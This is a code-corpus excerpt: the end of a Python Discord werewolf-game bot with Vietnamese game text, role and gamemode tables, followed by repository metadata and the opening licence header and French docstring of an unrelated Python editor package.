random.choice(lang['hastotem2']).format(get_name(totem_holders[0]), get_name(totem_holders[1]))) else: await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['hastotems']).format('**, **'.join([get_name(x) for x in totem_holders[:-1]]), get_name(totem_holders[-1]))) for player in killed_temp: session[1][player][0] = False for player in wolf_turn: session[1][player][1] = 'wolf' for player in session[1]: session[1][player][2] = '' if session[0] and win_condition() == None: await check_traitor() # DAY session[3][1] = datetime.now() if session[0] and win_condition() == None: await client.send_message(client.get_channel(GAME_CHANNEL), ":sun_with_face: Bây giờ là **ban ngày**. dùng `{}lynch <player>` đều bầu giết <player>. :smiley:".format(BOT_PREFIX)) for player in session[1]: if session[1][player][0] and 'blinding_totem' in session[1][player][4]: if 'injured' not in session[1][player][4]: session[1][player][4].append('injured') for i in range(session[1][player][4].count('blinding_totem')): session[1][player][4].remove('blinding_totem') try: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.send_message(member, ":dizzy_face: Lá bùa bạn đang cầm bùng cháy. " "Bạn thấy lóa mắt và có vẻ như nó sẽ không khỏi " "nên bạn đi nghỉ...:dizzy_face:") except discord.Forbidden: pass lynched_player = None warn = False totem_dict = {} # For impatience and pacifism while win_condition() == None and session[2] and lynched_player == None and session[0]: for player in [x for x in session[1]]: totem_dict[player] = session[1][player][4].count('impatience_totem') - session[1][player][4].count('pacifism_totem') vote_dict = get_votes(totem_dict) if vote_dict['abstain'] >= len([x for x in session[1] if session[1][x][0] and 'injured' not in session[1][x][4]]) / 2: lynched_player = 'abstain' max_votes = max([vote_dict[x] for x in vote_dict]) max_voted = [] if max_votes >= len([x for x in session[1] if session[1][x][0] and 'injured' not in session[1][x][4]]) // 2 + 1: for voted in vote_dict: if vote_dict[voted] == max_votes: max_voted.append(voted) lynched_player = random.choice(max_voted) if (datetime.now() - session[3][1]).total_seconds() > DAY_TIMEOUT: session[3][0] = datetime.now() # hopefully a fix for time being weird session[2] = False if (datetime.now() - session[3][1]).total_seconds() > DAY_WARNING and warn == False: warn = True await client.send_message(client.get_channel(GAME_CHANNEL), "**:smiling_imp: Khi dân làng nhận ra mặt trời đã gần khuất núi " "ánh chiều tà ngả dần sang bóng tối, họ nhận ra rằng còn rất ít thời gian để thống nhất nên treo " "ai; Nếu họ không thống nhất thì đa số sẽ thắng thiểu số. Và sẽ không ai bị treo nếu " "không ai bầu hoặc vote hòa nhau.:smiling_imp:**") await asyncio.sleep(0.1) if not lynched_player and win_condition() == None and session[0]: vote_dict = get_votes(totem_dict) max_votes = max([vote_dict[x] for x in vote_dict]) max_voted = [] for voted in vote_dict: if vote_dict[voted] == max_votes and voted != 'abstain': max_voted.append(voted) if len(max_voted) == 1: lynched_player = max_voted[0] if session[0]: session[3][0] = datetime.now() # hopefully a fix for time being weird day_elapsed = datetime.now() - session[3][1] session[4][1] += day_elapsed lynched_msg = "" if lynched_player and win_condition() == None and session[0]: if lynched_player == 'abstain': for player in [x for x in totem_dict if session[1][x][0] and totem_dict[x] < 0]: lynched_msg += "**{}** không muốn bầu treo cổ hôm nay :pray:.\n".format(get_name(player)) lynched_msg += "Dân làng hùa nhau éo treo ai :rage:." await client.send_message(client.get_channel(GAME_CHANNEL), lynched_msg) else: for player in [x for x in totem_dict if session[1][x][0] and totem_dict[x] > 0 and x != lynched_player]: lynched_msg += "**{}** đã nóng vội bầu treo cổ **{}** :dizzy_face:.\n".format(get_name(player), get_name(lynched_player)) lynched_msg += '\n' if 'revealing_totem' in session[1][lynched_player][4]: lynched_msg += ':scream: Khi dân làng đang chuẩn bị treo cổ **{0}**, Là bùa của họ bùng cháy! Khi dân làng hết bị lóa mắt, ' lynched_msg += 'họ nhận ra {0} đã trốn thoát! Lá bùa bị bỏ lại nói rằng kẻ trốn thoát là **{1}** :scream:.' lynched_msg = lynched_msg.format(get_name(lynched_player), get_role(lynched_player, 'role')) await client.send_message(client.get_channel(GAME_CHANNEL), lynched_msg) else: lynched_msg += random.choice(lang['lynched']).format(get_name(lynched_player)) await client.send_message(client.get_channel(GAME_CHANNEL), lynched_msg) session[1][lynched_player][0] = False member = client.get_server(WEREWOLF_SERVER).get_member(lynched_player) if member: await client.remove_roles(member, PLAYERS_ROLE) if get_role(lynched_player, 'role') == 'fool' and 'revealing_totem' not in session[1][lynched_player][4]: win_msg = ":joy: Chúc mừng! Các bạn đã treo cổ thằng ngu! Nó thắng rồi ahihi! :joy:\n\n" + end_game_stats() await end_game(win_msg, [lynched_player]) return elif lynched_player == None and win_condition() == None and session[0]: await client.send_message(client.get_channel(GAME_CHANNEL), "Không đủ phiếu bầu để treo cổ.:wave:") # BETWEEN DAY AND NIGHT session[2] = False if session[0] and win_condition() == None: await client.send_message(client.get_channel(GAME_CHANNEL), ":zzz: Ngày kéo dài **{0:02d}:{1:02d}**. Dân làng vì quá mệt mỏi nên đã đi ngủ.:zzz:".format( day_elapsed.seconds // 60, day_elapsed.seconds % 60)) for player in session[1]: session[1][player][4][:] = [x for x in session[1][player][4] if x not in [ 'revealing_totem', 'influence_totem', 'impatience_totem', 'pacifism_totem', 'injured']] session[1][player][2] = '' if session[0] and win_condition() == None: await check_traitor() if session[0]: win_msg = win_condition() await end_game(win_msg[1], win_msg[2]) async def start_votes(player): start = datetime.now() while (datetime.now() - start).total_seconds() < 60: votes_needed = max(2, min(len(session[1]) // 4 + 1, 4)) votes = len([x for x in session[1] if session[1][x][1] == 'start']) if votes >= votes_needed or session[0] or votes == 0: break await asyncio.sleep(0.1) else: for player in session[1]: session[1][player][1] = '' await client.send_message(client.get_channel(GAME_CHANNEL), "Không đủ phiếu bắt đầu game, bắt đầu bầu lại.") async def rate_limit(message): if not (message.channel.is_private or message.content.startswith(BOT_PREFIX)) or message.author.id in ADMINS or message.author.id == OWNER_ID: return False global ratelimit_dict global IGNORE_LIST if message.author.id not in ratelimit_dict: ratelimit_dict[message.author.id] = 1 else: ratelimit_dict[message.author.id] += 1 if ratelimit_dict[message.author.id] > IGNORE_THRESHOLD: if not message.author.id in IGNORE_LIST: IGNORE_LIST.append(message.author.id) await log(2, message.author.name + " (" + message.author.id + ") was added to the ignore list for rate limiting.") try: await reply(message, "Bạn đã xài {0} lệnh trong {1} giây; Tôi sẽ bơ bạn đến hết game.:rage:".format(IGNORE_THRESHOLD, TOKEN_RESET)) except discord.Forbidden: await client.send_message(client.get_channel(GAME_CHANNEL), message.author.mention + " xài {0} lệnh trong {1} giây và bạn sẽ bị bơ đến cuối game.:rage:".format(IGNORE_THRESHOLD, TOKEN_RESET)) finally: return True if message.author.id in IGNORE_LIST or ratelimit_dict[message.author.id] > TOKENS_GIVEN: if ratelimit_dict[message.author.id] > TOKENS_GIVEN: await log(2, "Ignoring message from " + message.author.name + " (" + message.author.id + "): `" + message.content + "` since no tokens remaining") return True return False async def do_rate_limit_loop(): await client.wait_until_ready() global ratelimit_dict while not client.is_closed: for user in ratelimit_dict: ratelimit_dict[user] = 0 await asyncio.sleep(TOKEN_RESET) async def game_start_timeout_loop(): session[5] = datetime.now() while not session[0] and len(session[1]) > 0 and datetime.now() - session[5] < timedelta(seconds=GAME_START_TIMEOUT): await asyncio.sleep(0.1) if not session[0] and len(session[1]) > 0: session[0] = True await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.online) await client.send_message(client.get_channel(GAME_CHANNEL), "{0}, Game chờ quá lâu để bắt đầu nên đã bị hủy. " "Nếu bạn còn ở đây và vẫn muốn chơi, hãy gõ `..join` lần nữa.".format(PLAYERS_ROLE.mention)) perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) perms.send_messages = True await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) for player in list(session[1]): del session[1][player] member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.remove_roles(member, PLAYERS_ROLE) session[0] = False session[3] = [0, 0] session[4] = [timedelta(0), timedelta(0)] session[6] = '' session[7] = {} async def backup_settings_loop(): while not client.is_closed: print("BACKING UP SETTINGS") with open(NOTIFY_FILE, 'w') as notify_file: notify_file.write(','.join([x for x in notify_me if x != ''])) with open(STASIS_FILE, 'w') as stasis_file: json.dump(stasis, stasis_file) await asyncio.sleep(BACKUP_INTERVAL) ############## POST-DECLARATION STUFF ############### COMMANDS_FOR_ROLE = {'see' : ['seer'], 'kill' : ['wolf', 'werecrow', 'werekitten', 'hunter'], 'give' : ['shaman'], 'visit' : ['harlot'], 'shoot' : ['gunner'], 'observe' : ['werecrow', 'sorcerer'], 'pass' : ['harlot', 'hunter'], 'id' : ['detective']} GAMEPLAY_COMMANDS = ['join', 'j', 'start', 'vote', 'lynch', 'v', 'abstain', 'abs', 'nl', 'stats', 'leave', 'q', 'role', 'roles'] GAMEPLAY_COMMANDS += list(COMMANDS_FOR_ROLE) # {role name : [team, plural, description]} roles = {'wolf' : ['wolf', 'wolves', "Mục tiêu của bạn là giết hết tất cả dân làng. Gõ `kill <player>` trong tin nhắn với bot để giết người bạn chọn."], 'werecrow' : ['wolf', 'werecrows', "Bạn theo phe sói. Dùng `observe <player>` vào ban đêm để xem người bạn chọn có đang trên giường hay không. " "Bạn cũng có thể xài `kill <player>` để giết người bạn chọn."], 'werekitten' : ['wolf', 'werekittens', "Bạn thuộc sói-squad. Nhưng vì bạn quá dễ thương :3 nên nếu bị soi bạn sẽ không khả nghi " "và kẻ có súng sẽ luôn bắn trượt bạn. Dùng `kill <player>` trong tin nhắn riêng với bot " "để bầu chọn giết <player>."], 'traitor' : ['wolf', 'traitors', "Bạn giống y hệt dân làng, nhưng bạn theo phe sói. Chỉ có thám tử mới có thể lật tẩy danh tính " "thật. Khi tất cả sói chết, bạn trở thành sói."], 'sorcerer' : ['wolf', 'sorcerers', "Bạn có thể dùng lệnh `observe <player>` trong tin nhắn riêng với bot vào ban đêm để xem người đó " "có phải là tiên tri hay không. Bạn sẽ không bị soi bởi tiên tri và chỉ có detective mới có thể soi ra bạn."], 'cultist' : ['wolf', 'cultists', "Vai trò của bạn là hỗ trợ phe sói giết hết dân làng."], 'seer' : ['village', 'seers', "Vai trò của bạn là nhận diện sói; Bạn có 1 lần soi mỗi đêm. Gõ `see <player>` trong tin nhắn riêng với bot để xem vai người bạn chọn."], 'shaman' : ['village', 'shamans', "Bạn chọn 1 người mỗi đêm để đưa bùa chú bằng lệnh `give <player>`. Bạn có thể tự cho mình bùa, nhưng bạn không cho cùng 1" " người bùa 2 đêm liên tiếp. Nếu bạn không xài lệnh, bùa sẽ được phát ngẫu nhiên. " "Để xem bùa mình đang có, dùng lệnh `myrole`."], 'harlot' : ['village', 'harlots', "Bạn có thể 'ngủ' cùng 1 người mỗi đêm bằng lệnh `visit <player>`. Nếu bạn ngủ cùng mục tiêu của sói, hay ngủ cùng sói, " "bạn sẽ chết. Bạn có thể tự ngủ với chính mình để ở nhà."], 'hunter' : ['village', 'hunters', "Vai trò của bạn là giúp giết hết sói. Mỗi game bạn có thể giết 1 người sử dụng lệnh `kill <player>`. " "Nếu không muốn giết ai đêm nay, dùng lệnh `pass`."], 'detective' : ['village', 'detectives', "Nhiệm vụ của bạn là chỉ ra sói và kẻ phản bội (traitor). Vào BUỔI SÁNG, bạn có thể xài `id <player>` trong tin nhắn riêng với bot " "để xác định vai người được chọn. Nhưng bạn sẽ có {}% khả năng bị lộ vai cho phe sói mỗi lần bạn sử dụng lệnh.".format(int(DETECTIVE_REVEAL_CHANCE * 100))], 'villager' : ['village', 'villagers', "Khả năng đặc biệt nhất, chết khi bị giết. Ngoài ra éo có gì đặc biệt hơn. Bạn giúp dân làng bắt sói."], 'crazed shaman' : ['neutral', 'crazed shamans', "Bạn chọn 1 người để đưa bùa ngẫu nhiên bằng lệnh `give <player>`. Bạn có thể đưa bùa cho chính mình, " "nhưng không thể đưa 1 người 2 đêm liên tiếp. Nếu bạn không đưa bùa cho ai, " "bùa sẽ được phát ngẫu nhiên. Bạn thắng nếu bạn còn sống ở cuối game."], 'fool' : ['neutral', 'fools', "Bạn là người thắng nếu bạn bị treo cổ vào buổi sáng. Nếu không thì thua."], 'cursed villager' : ['template', 'cursed villagers', "Vai này bị ẩn và tiên tri sẽ coi người bị nguyền là sói. Các vai của sói, tiên tri, và thằng ngu không thể bị nguyền."], 'gunner' : ['template', 'gunners', "Vai này cho người chơi 1 khẩu súng lục. Gõ `shoot <player>` ở ROOM CHAT vào BAN NGÀY để giết <player>. " "Nếu bạn là dân và bắn sói, nó sẽ chết. Nếu không, sẽ có khả năng giết họ, gây chấn thương " ", hoặc súng nổ tung. Nếu bạn là sói mà bắn sói, bạn sẽ cố ý bắn trượt."]} gamemodes = { 'default' : { 'description' : "Gamemode mặc định.", 'min_players' : 4, 'max_players' : 20, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20 'wolf' : [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'werekitten' : [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'sorcerer' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1], 'cultist' : [0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0], 'seer' : [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2], 'shaman' : [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2], 'harlot' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'hunter' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1], 'detective' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'villager' : [2, 3, 4, 3, 3, 3, 3, 4, 3, 3, 4, 4, 4, 5, 5, 6, 5], 'crazed shaman' : [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2], 'cursed villager' : [0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3], 'gunner' : [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]} }, 'test' : { 'description' : "Gamemode thử nghiệm, nên ko dùng.", 'min_players' : 5, 'max_players' : 20, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20 'wolf' : [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'werekitten' : [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'sorcerer' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1], 'cultist' : [0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0], 'seer' : [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2], 'shaman' : [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2], 'harlot' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'hunter' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1], 'detective' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'villager' : [2, 3, 4, 3, 3, 3, 3, 4, 3, 3, 4, 4, 4, 5, 5, 6, 5], 'crazed shaman' : [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2], 'fool' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'cursed villager' : [0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3], 'gunner' : [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]} }, 'foolish' : { 'description' : "Cẩn thận, vì thằng ngu có thể nhảy ra từ bất kì đâu để cướp chiến thắng!.", 'min_players' : 8, 'max_players' : 20, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20 'wolf' : [0, 0, 0, 0, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werekitten' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'sorcerer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'shaman' : [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2], 'harlot' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2], 'hunter' : [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'detective' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1], 'villager' : [0, 0, 0, 0, 3, 3, 3, 2, 2, 3, 4, 3, 4, 3, 4, 5, 5], 'crazed shaman' : [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'fool' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'cursed villager' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'gunner' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1]} }, 'chaos' : { 'description' : "Hỗn loạn và khó lường. Bất cứ ai, kể cả sói, đều có thể sở hữu súng.", 'min_players' : 4, 'max_players' : 16, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [1, 1, 1, 1, 1, 1, 2, 2, 2, 3, 3, 3, 3], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [3, 4, 4, 4, 3, 4, 3, 2, 3, 1, 2, 1, 1], 'harlot' : [0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [0, 0, 0, 0, 1, 1, 1, 2, 2, 3, 3, 4, 4], 'fool' : [0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'gunner' : [1, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3]} }, 'orgy' : { 'description' : "Cẩn thận người bạn sẽ ăn nằm cùng đêm nay! ( ͡° ͜ʖ ͡°)", 'min_players' : 4, 'max_players' : 16, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [1, 1, 1, 1, 1, 1, 2, 2, 2, 3, 3, 3, 3], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4], 'harlot' : [3, 4, 4, 4, 3, 4, 3, 2, 3, 1, 2, 1, 1], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [0, 0, 0, 0, 1, 1, 1, 2, 2, 3, 3, 4, 4], 'fool' : [0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]} }, 'crazy' : { 'description' : "Thật nhiều bùa chú ngẫu nhiên!.", 'min_players' : 4, 'max_players' : 16, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 2], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 2, 2, 2], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'harlot' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [3, 4, 5, 6, 5, 6, 7, 7, 7, 8, 8, 9, 9], 'fool' : [0, 0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]} }, 'belunga' : { 'description' : "Gamemode điên khùng cho ngày cá tháng tư =)).", 'min_players' : 4, 'max_players' : 20, 'roles' : {} }, 'random' : { 'description' : "Ngoài việc đảm bảo trò chơi sẽ không kết thúc ngay lập tức, chả ai biết sẽ có vai nào xuất hiện.", 'min_players' : 8, 'max_players' : 16, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werekitten' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'traitor' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'harlot' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'hunter' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'gunner' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]} }, 'template' : { 'description' : "This is a template you can use for making your own gamemodes.", 'min_players' : 0, 'max_players' : 0, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werekitten' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'traitor' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'harlot' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'hunter' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'detective' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'gunner' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]} } } gamemodes['belunga']['roles'] = dict(gamemodes['default']['roles']) VILLAGE_ROLES_ORDERED = ['seer', 'shaman', 'harlot', 'hunter', 'detective', 'villager'] WOLF_ROLES_ORDERED = ['wolf', 'werecrow', 'werekitten', 'traitor', 'sorcerer', 'cultist'] NEUTRAL_ROLES_ORDERED = ['crazed shaman', 'fool'] TEMPLATES_ORDERED = ['cursed villager', 'gunner'] totems = {'death_totem' : 'Người chơi nhận được bùa này sẽ hi sinh tối nay.', 'protection_totem': 'Người chơi nhận được bùa này sẽ được bảo vệ đêm nay.', 'revealing_totem': 'Nếu người nhận được bùa này bị treo cổ, vai của họ sẽ bị lộ thay vì phải chết.', 'influence_totem': 'Giá trị phiếu bầu của người sở hữu lá bùa này sẽ gấp đôi người thường vào sáng mai.', 'impatience_totem' : 'Người giữ lá bùa này sẽ vote cho tất cả người chơi trừ họ vào sáng mai, cho dù họ có muốn vote hay không.', 'pacifism_totem' : 'Người giữ lá bùa này sẽ bỏ phiếu trắng cho tất cả người chơi vào sáng mai dù họ có muốn vote hay không.', 'cursed_totem' : 'Người sỡ hữu lá bùa này sẽ bị nguyền rủa nếu họ không bị nguyền rủa sẵn.', 'lycanthropy_totem' : 'Người giữ lá bùa này nếu bị giết bởi sói vào tối nay, họ sẽ không chết mà hóa sói.', 'retribution_totem' : 'Nếu người giữ lá bùa này bị giết bởi sói vào tối nay thì họ sẽ giết 1 con sói ngẫu nhiên để trả thù.', 'blinding_totem' : 'Người giữ lá bùa này sẽ bị chấn thương và không thể vote vào sáng mai.', 'deceit_totem' : 'Nếu người giữ lá bùa này bị soi bởi tiên tri tối nay thì kết quả soi của tiên tri sẽ trái ngược với sự thật ' 'Nếu tiên tri giữ lá bùa này, kết quả soi tối nay của họ sẽ bị đảo ngược.'} SHAMAN_TOTEMS = ['death_totem', 'protection_totem', 'revealing_totem', 'influence_totem', 'impatience_totem', 'pacifism_totem', 'retribution_totem'] ROLES_SEEN_VILLAGER = ['werekitten', 'traitor', 'sorcerer', 'cultist', 'villager', 'fool'] ROLES_SEEN_WOLF = ['wolf', 'werecrow', 'cursed'] ACTUAL_WOLVES = ['wolf', 'werecrow', 'werekitten'] WOLFCHAT_ROLES = ['wolf', 'werecrow', 'werekitten', 'traitor', 'sorcerer', 'cultist'] ########### END POST-DECLARATION STUFF ############# client.loop.create_task(do_rate_limit_loop()) client.loop.create_task(backup_settings_loop()) client.run(TOKEN)
Luc1fer666/Discord_project
bot.py
Python
mit
176,146
[ "VisIt" ]
5baa61d2c7ed5a1e3effb411af4cf3a5c62fae324c11a2a603a44ec999301779
# -*-coding:Utf-8 -* # Copyright (c) 2010-2017 LE GOFF Vincent # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # * Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """Package contenant l'éditeur 'socedit'. Si des redéfinitions de contexte-éditeur standard doivent être faites, elles seront placées dans ce package. Note importante : ce package contient la définition d'un éditeur, mais celui-ci peut très bien être étendu par d'autres modules. Auquel cas, les extensions 